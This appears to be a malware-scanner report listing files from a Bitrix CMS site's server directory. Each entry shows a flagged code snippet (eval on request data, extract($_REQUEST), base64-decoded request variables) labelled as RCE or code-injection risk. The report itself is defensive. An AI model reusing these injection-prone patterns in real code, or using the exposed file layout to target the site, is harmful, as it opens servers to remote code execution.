eval(<?=$arStates;?>);
var Dialog = false;
var current = 0;
var next = 0;
var prev = 0;
var last_id = false;
function InitState()
{
var el = false;
for (var i=0;i<arStates["SECTIONS"].length;i++)
{
el = arStates["SECTIONS"][i];
if (el.CHECKED == "Y")
BX.addClass(BX(el.ID+"_name"),"checklist-testlist-green");
BX(el.ID+"_stat").innerHTML = "(<span class=\"checklist-testlist-passed-test\">"+el.CHECK+"</span>/"+el.TOTAL+")";
}
for (i=0;i<arStates["POINTS...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/main_controller.php Size: 8.74 kB Created: 2018-01-17 22:07:21 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($oRequest->arParameters['join_command']); $oResponse->status = "200 OK"; } else { $oResponse->status = "472 Bad Request"; $oResponse->text = GetMessage("MAIN_ADM_CONTROLLER_ERR8"); } } elseif(!$oRequest->Check()) { $oResponse->status = "403 Access Denied"; $oResponse->text = "Access Denied"; } else { switch($oRequest->operation) { case "ping": $oResponse->status = "200 OK"; break; case "register": $ticket_id = COption::GetOptionString("main", "controller_ticket", ""); list($ticket_created, ...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/php_command_line.php Size: 10.83 kB Created: 2018-01-19 19:01:35 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($query); ob_end_flush(); printf("<hr>".GetMessage("php_cmd_exec_time")." %0.6f", microtime(1) - $stime); } require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin_js.php"); die(); } $APPLICATION->SetTitle(GetMessage("php_cmd_title")); CJSCore::Init(array('ls')); if( $_SERVER['REQUEST_METHOD'] == 'POST' && $_POST["ajax"] === "y" && (isset($_POST["add"]) || $remove) ) { CUtil::JSPostUnescape(); require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_a...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/update_system_market.php Size: 29.34 kB Created: 2018-01-19 19:02:09 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/checklist.php Size: 44.38 kB Created: 2018-01-19 19:02:09 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(<?=$arStates;?>);
var DetailWindow = false;
var arMainStat ={
"REQUIRE":<?=$arStat["REQUIRE"];?>,
"REQUIRE_CHECK":<?=$arStat["REQUIRE_CHECK"];?>,
"FAILED":<?=$arStat["FAILED"];?>,
"SUCCESS":<?=$arStat["CHECK"];?>,
"SUCCESS_R":<?=$arStat["CHECK_R"];?>,
"TOTAL":<?=$arStat["TOTAL"];?>
};
var arRequireCount=<?=$arStat["REQUIRE"];?>;
var arRequireCheckCount=<?=$arStat["REQUIRE_CHECK"];?>;
var arFailedCount = <?=$arStat["FAILED"];?>;
var CanClose = "<?=$arCanClose;...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/index.php Size: 649.00 B Created: 2018-01-17 22:07:21 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/partner_modules.php Size: 18.52 kB Created: 2018-01-19 18:57:16 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["MODULE_SORT"] == $b["MODULE_SORT"]) return strcasecmp($a["MODULE_NAME"], $b["MODULE_NAME"]); return ($a["MODULE_SORT"] < $b["MODULE_SORT"])? -1 : 1;')); $stableVersionsOnly = COption::GetOptionString("main", "stable_versions_only", "Y"); $arRequestedModules = CUpdateClientPartner::GetRequestedModules(""); $arUpdateList = CUpdateClientPartner::GetUpdatesList($errorMessage, LANG, $stableVersionsOnly, $arRequestedModules, Array("fullmoduleinfo" => "Y")); $strError_...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/site_checker.php Size: 35.03 kB Created: 2018-01-19 19:02:09 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 242 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode($_REQUEST['global_test_vars'])
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(result);
var oTable = BX('fix_table');
if (oRow = BX('in_progress'))
{
oCell = oRow.cells[1];
}
else
{
oRow = oTable.insertRow(-1);
oCell = oRow.insertCell(-1);
oCell.style.width = '40%';
oCell.innerHTML = strCurrentTestName;
oCell = oRow.insertCell(-1);
}
if (strResult == '')
{
oRow.setAttribute('id', 'in_progress');
oCell.innerHTML = '<div class="sc_progress" style="width:' + test_percent + '%">' + test_percent ...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/dump.php Size: 46.38 kB Created: 2018-01-19 19:02:09 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(result))
counter_sec = regs[1];
}
}
function IncCounter()
{
window.setTimeout(IncCounter, 1000);
if (!counter_started)
return;
counter_sec ++;
var ob;
if (ob = BX('counter_field'))
{
var min = Math.floor(counter_sec / 60);
var sec = counter_sec % 60;
if (min < 10)
min = '0' + min;
if (sec < 10)
sec = '0' + sec;
ob.innerHTML = min + ':' + sec;
}
}
window.setTimeout(IncCounter, 1000);
function GetLicenseInfo()
{
CHttpRequest.Action = function(result)
{
BX('...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/user_admin.php Size: 25.55 kB Created: 2018-01-19 19:03:45 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 77 Warning Double var technique is usually used for the obfuscation of malicious code |
${$f}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/admin/checklist_detail.php Size: 15.88 kB Created: 2018-01-19 18:59:48 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 25 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/lang/".LANG."/admin/checklist.php")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("(" +data+")");
var show_result = false;
var buttons = BX.findChildren(BX('checklist-popup-tes-status'), {className:'checklist-popup-tes-status'});
if (json_data.STATUS || stoptest == true)
{
if (json_data.STATUS)
{
BX("show_detail_link").style.display = "none";
BX("detail_system_comment_<?=$jsTestID;?>").innerHTML = "";
currentStatus = json_data.STATUS;
RefreshCheckList(json_data);
for(var i=0; i<buttons.length; i++)
BX.removeCl...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/spread.php Size: 1.43 kB Created: 2023-04-12 19:52:18 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/tools/upload.php Size: 984.00 B Created: 2018-01-19 18:57:16 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/gadgets/bitrix/probki/.description.php Size: 142.00 B Created: 2018-01-17 22:07:10 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/gadgets/bitrix/probki/.parameters.php Size: 102.00 B Created: 2018-01-17 22:07:10 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/gadgets/bitrix/probki/index.php Size: 98.00 B Created: 2018-01-17 22:07:10 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/gadgets/bitrix/admin_info/index.php Size: 2.18 kB Created: 2018-01-17 22:07:10 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/gadgets/bitrix/weather/.description.php Size: 143.00 B Created: 2018-01-17 22:07:10 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/gadgets/bitrix/weather/.parameters.php Size: 103.00 B Created: 2018-01-17 22:07:10 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/gadgets/bitrix/weather/index.php Size: 99.00 B Created: 2018-01-17 22:07:10 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/gadgets/bitrix/admin_security/index.php Size: 4.50 kB Created: 2018-01-19 19:02:17 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/components/bitrix/main.interface.grid/component.php Size: 9.39 kB Created: 2018-01-19 18:46:22 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a["name"], $b["name"]);'); uasort($aOptions["views"], $func); $arResult["OPTIONS"] = $aOptions; $arResult["GLOBAL_OPTIONS"] = CUserOptions::GetOption("main.interface", "global", array(), 0); if($arParams["USE_THEMES"]) { if($arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID] <> '') $arResult["GLOBAL_OPTIONS"]["theme"] = $arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID]; if($arResult["OPTIONS"]["theme"] == '') $arResult["OPTIONS"...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/components/bitrix/main.ui.grid/templates/.default/template.php Size: 31.21 kB Created: 2018-01-19 19:02:20 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(<?=CUtil::phpToJSObject($arResult["DATA_FOR_EDIT"])?>);
var defaultColumns = eval(<?=CUtil::phpToJSObject($arResult["DEFAULT_COLUMNS"])?>);
var Grid = BX.Main.gridManager.getById('<?=$arParams["GRID_ID"]?>');
var messages = eval(<?=CUtil::phpToJSObject($arResult["MESSAGES"])?>);
Grid = Grid ? Grid.instance : null;
if (Grid)
{
Grid.arParams.DEFAULT_COLUMNS = defaultColumns;
Grid.arParams.MESSAGES = messages;
if (action !== 'more')
{
Grid.arParams.EDITABLE_DATA ...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/components/bitrix/main.map/component.php Size: 5.85 kB Created: 2018-01-17 22:07:16 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 157 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$full_path.".section.php")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ".$CONDITION.";"))) continue; } $search_child = false; $search_path = ''; $full_path = ''; if ($aMenu[1] <> '') { if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i", $aMenu[1])) { $full_path = $aMenu[1]; } else { $full_path = trim(Rel2Abs(substr($PARENT_PATH, strlen($_SERVER["DOCUMENT_ROOT"])), $aMenu[1])); $slash_pos = strrpos($full_path, "/"); if ($slash_pos !== false) { $page = substr($full_path, $slash_pos+1); if(($pos = strpos($page, '?')) !== false) $page = substr($page,...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/components/bitrix/main.post.form/templates/.default/template.php Size: 16.90 kB Created: 2018-01-19 19:02:09 Modified: 2023-11-27 14:53:26 Dangers: 3
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/components/bitrix/main.user.link/component.php Size: 19.17 kB Created: 2018-01-19 18:59:48 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/bitrix/coupon_activation.php Size: 16.58 kB Created: 2018-01-19 18:59:50 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/bitrix/index.php Size: 83.00 B Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Dangers: 1
| Description | Match |
|---|
Sign 0f37c730 Line: 2 Dangerous Malware Signature (hash: 0f37c730) |
meta http-equiv="REFRESH" content="0;
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/wizard/template.php Size: 9.12 kB Created: 2018-01-17 22:07:13 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/wizard/wizard.php Size: 132.22 kB Created: 2018-01-19 19:03:44 Modified: 2023-11-27 14:53:27 Warns: 1 Dangers: 5
| Description | Match |
|---|
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($handler, '<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php")
| Exploit download_remote_code2 Line: 3991 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($handler,
'<'.'?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php")
| Exploit execution Line: 226 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')
| Exploit execution Line: 2763 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/dbconn.php")
| Exploit execution Line: 44 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcasecmp($a, $b);')); array_unshift($arModules, "main"); return $arModules; } function GetNextStep($currentStep, $currentStepStage, $stepSuccess) { $stepIndex = array_search($currentStep, $this->arSteps); if ($currentStepStage == "utf8") { $nextStep = $currentStep; $nextStepStage = "database"; } elseif ($currentStepStage == "database" && $stepSuccess) { $nextStep = $currentStep; $nextStepStage = "files"; } else { if (!isset($this->arSteps[$stepIndex+1])) retur...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/wizard/utils.php Size: 28.76 kB Created: 2018-01-19 19:03:44 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/wizard_sol/template.php Size: 9.27 kB Created: 2018-01-17 22:07:10 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/wizard_sol/utils.php Size: 13.62 kB Created: 2018-01-17 22:07:10 Modified: 2023-11-27 14:53:27 Warns: 2 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a["SORT"], $b["SORT"]);')); return $arWizardTemplates; } function GetTemplatesPath($path) { $templatesPath = $path."/templates"; if (file_exists($_SERVER["DOCUMENT_ROOT"].$templatesPath."/".LANGUAGE_ID)) $templatesPath .= "/".LANGUAGE_ID; return $templatesPath; } function GetServices($wizardPath, $serviceFolder = "", $arFilter = Array()) { $arServices = Array(); $wizardPath = rtrim($wizardPath, "/"); $serviceFolder = rtrim($serviceFolder, "/"); if (LANGU...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("?>".file_get_contents($documentRoot.$pathDir."/.access.php")); } if (!isset($PERM[$pathFile]) || !is_array($PERM[$pathFile])) $arPermisson = $permissions; else $arPermisson = $permissions + $PERM[$pathFile]; return $GLOBALS["APPLICATION"]->SetFileAccessPermission($originalPath, $arPermisson); } function AddMenuItem($menuFile, $menuItem, $siteID, $pos = -1) { if (CModule::IncludeModule('fileman')) { $arResult = CFileMan::GetMenuArray($_SERVER["DOCUMENT_ROOT"].$menuFile); $arMenuItems = $arR...
| Sign 11413268 Line: 313 Dangerous Malware Signature (hash: 11413268) |
eval("?>
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/templates/main/map/default.php Size: 13.58 kB Created: 2018-01-17 22:07:13 Modified: 2023-11-27 14:53:27 Warns: 1 Dangers: 6
| Description | Match |
|---|
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$PARENT_PATH..trim($cmenu)
| Exploit execution Line: 203 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$child_menu)
| Exploit execution Line: 209 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$PARENT_PATH.".".trim($cmenu)
| Exploit execution Line: 341 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$main_menu)
| Exploit extract_global Line: 14 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
| Exploit silenced_eval Line: 220 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval("return ".$CONDITION.";")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ".$CONDITION.";"))) continue; } if (strlen($aMenu[1])>0) { $search_child = true; if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i", $aMenu[1])) $full_path = $aMenu[1]; else $full_path = trim(Rel2Abs($PARENT_PATH, $aMenu[1])); } else { $search_child = false; $full_path = $PARENT_PATH; } if (strlen($full_path)>0) { $FILE_ACCESS = (preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i", $full_path)) ? "R" : $APPLICATION->GetFileAccessPermission($full_path); if ($FILE_ACCESS!="D" ...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/templates/main/auth/authorize_registration.php Size: 6.90 kB Created: 2018-01-17 22:07:13 Modified: 2023-11-27 14:53:27 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 2 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/templates/main/auth/authorize.php Size: 3.79 kB Created: 2018-01-17 22:07:13 Modified: 2023-11-27 14:53:27 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 2 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/templates/main/auth/change_password.php Size: 3.49 kB Created: 2018-01-17 22:07:13 Modified: 2023-11-27 14:53:27 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 2 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/templates/main/auth/forgot_password.php Size: 2.54 kB Created: 2018-01-17 22:07:13 Modified: 2023-11-27 14:53:27 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 2 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/templates/main/auth/registration.php Size: 6.25 kB Created: 2018-01-17 22:07:13 Modified: 2023-11-27 14:53:27 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 2 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/install/templates/main/profile.php Size: 29.00 kB Created: 2018-01-17 22:07:13 Modified: 2023-11-27 14:53:27 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 7 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST, EXTR_SKIP)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lang/en/classes/general/update_update5.php Size: 25.89 kB Created: 2018-01-17 22:07:21 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (in other words, no updates may be available). If any of the module updates are available, please install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of wesbsites using this product installation."; $MESS["SUP_CHECK_PROMT_1"] = "You can extend your period of technical support, purchase additi...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lang/en/classes/general/update_client.php Size: 24.45 kB Created: 2018-01-17 22:07:21 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (in other words, no updates may be available). If any of the module updates are available, please install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of websites using this product installation."; $MESS["SUP_CHECK_PROMT_21"] = "You can add unlimited number of users for the current product co...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lang/en/classes/general/update_update.php Size: 22.66 kB Created: 2018-01-17 22:07:21 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (in other words, no updates may be available). If any of the module updates are available, please install it first."; $MESS["SUP_SRC_ACT_ALT"] = "Download source code"; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_SITES_PROMT"] = "You cannot create more than #NUM# site#END# using this kernel according to your license. If you need more sites, you can buy them any time. After you have purchased the additional sites, you will have to add them to the system."; $MESS["SUP_SITES_AC...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lang/en/admin/update_system.php Size: 15.12 kB Created: 2018-01-17 22:07:21 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (in other words, no updates may be available). If any of the module updates are available, please install them first."; $MESS["SUP_SUBS_BUTTON"] = "Download source code"; $MESS["SUP_SUPPORT_BUTTON"] = "Reload All Files"; $MESS["SUP_INITIAL"] = "Initialising..."; $MESS["SUP_SUBS_SUCCESS"] = "The source code has been downloaded successfully"; $MESS["SUP_SUPPORT_SUCCESS"] = "Files has been downloaded successfully."; $MESS["SUP_SUBS_MED"] = "Downloaded source code for"; $MESS["SUP_SUPPORT_MED...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lang/en/admin/site_checker.php Size: 51.25 kB Created: 2018-01-19 18:56:20 Modified: 2023-11-27 14:53:27 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 92 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lang/ua/admin/site_checker.php Size: 79.51 kB Created: 2018-01-19 19:01:39 Modified: 2023-11-27 14:53:28 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 84 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lang/ru/admin/site_checker.php Size: 81.03 kB Created: 2018-01-19 19:02:09 Modified: 2023-11-27 14:53:28 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 92 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/start.php Size: 12.83 kB Created: 2018-01-19 19:02:13 Modified: 2023-11-27 14:53:26 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/asd.iblock/classes/general/iblock_action.php Size: 31.26 kB Created: 2023-03-11 16:39:38 Modified: 2023-11-27 14:53:20 Dangers: 1
| Description | Match |
|---|
Exploit download_remote_code2 Line: 28 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($hdlOutput, CASDiblockTools::ExportPropsToXML($BID, $_REQUEST['p'])
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/asd.iblock/install/index.php Size: 6.16 kB Created: 2023-03-11 16:39:38 Modified: 2023-11-27 14:53:20 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/templates/info_light/components/bitrix/photogallery_user/.default/galleries_recalc.php Size: 9.64 kB Created: 2023-03-11 16:40:31 Modified: 2023-11-27 14:53:22 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("var result = " + data + "; "); }
if (result['status'] == 'inprogress')
{
document.getElementById('photogallery_recalc').innerHTML = result['text'];
if (__this_source.bReady == false)
{
document.getElementById('ButtonPhotoGalleryRecalcStart').disabled = false;
document.getElementById('ButtonPhotoGalleryRecalcContinue').disabled = false;
document.getElementById('ButtonPhotoGalleryRecalcStop').disabled = true;
}
else
{
document.getEleme...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/seo/admin/seo_tools.php Size: 39.07 kB Created: 2023-03-11 16:40:13 Modified: 2023-11-27 14:53:30 Dangers: 4
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/options.php Size: 17.59 kB Created: 2023-03-11 16:40:20 Modified: 2023-11-27 14:53:24 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(data.URL);
if (!res)
{
data.URL = 'http://' + data.URL;
res = r.exec(data.URL);
}
if (res)
{
data.URL_SERVER = res[1]+'://'+res[2];
data.URL_PATH = res[3];
}
}
if (!data.AUTH_HASH)
{
var content = '<div class="form-crm-settings"><form name="form_'+popup_id+'"><table cellpadding="0" cellspacing="2" border="0"><tr><td align="right"><?=CUtil::JSEscape(GetMessage('FORM_TAB_CRM_ROW_TITLE'))?>:</td><td><input type="text" name="NAME" value="'+(data.NAME||'')+'"></td>...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/mysql/form_cformvalidator.php Size: 368.00 B Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/mysql/form_cformstatus.php Size: 5.58 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/mysql/form_cformoutput.php Size: 400.00 B Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/mysql/form_cformresult.php Size: 15.00 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/mysql/form_cformfield.php Size: 413.00 B Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/mysql/form_cformanswer.php Size: 418.00 B Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/mysql/form_cform.php Size: 5.95 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/general/form_callformanswer.php Size: 7.88 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/general/form_cform_old.php Size: 9.24 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/form/classes/general/form_callformstatus.php Size: 17.77 kB Created: 2023-03-11 16:40:22 Modified: 2023-11-27 14:53:24 Dangers: 1
|
